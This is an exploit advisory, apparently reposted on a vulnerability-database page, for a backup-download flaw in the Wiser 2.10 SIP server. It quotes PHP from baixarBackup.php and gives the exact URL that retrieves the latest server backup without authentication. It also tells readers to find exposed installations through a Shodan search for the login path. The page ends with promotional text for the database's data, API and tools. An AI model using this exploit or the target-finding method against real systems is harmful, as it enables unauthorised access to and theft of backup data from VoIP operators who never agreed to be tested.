`Wiser 2.10 [SIP SERVER] - Backup download vulnerability
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [[email protected]] , [[email protected]]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.develsistemas.com.br/
####################################################################
VULNERABILITY
##############
/var/www/html/voip/sipserver/class/baixarBackup.php
Line 3:
require_once '/var/www/html/voip/sipserver/class/conexao.php';
Line 55-59:
function buscaBackup() {
$this->conectarSer();
$sql = "SELECT patch FROM backup WHERE patch IS NOT NULL ORDER BY
id DESC LIMIT 1";
$result = mysql_query($sql);
return $result ? (mysql_num_rows($result)>0 ? mysql_result
($result, 0, 'patch') : false) : false;
#########
EXPLOIT
#########
http://IP/voip/sipserver/class/baixarBackup.php
[Note]: To Find This Ip Go To shodanhq.com And Type Location:
voip/sipserver/login In Search Box
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation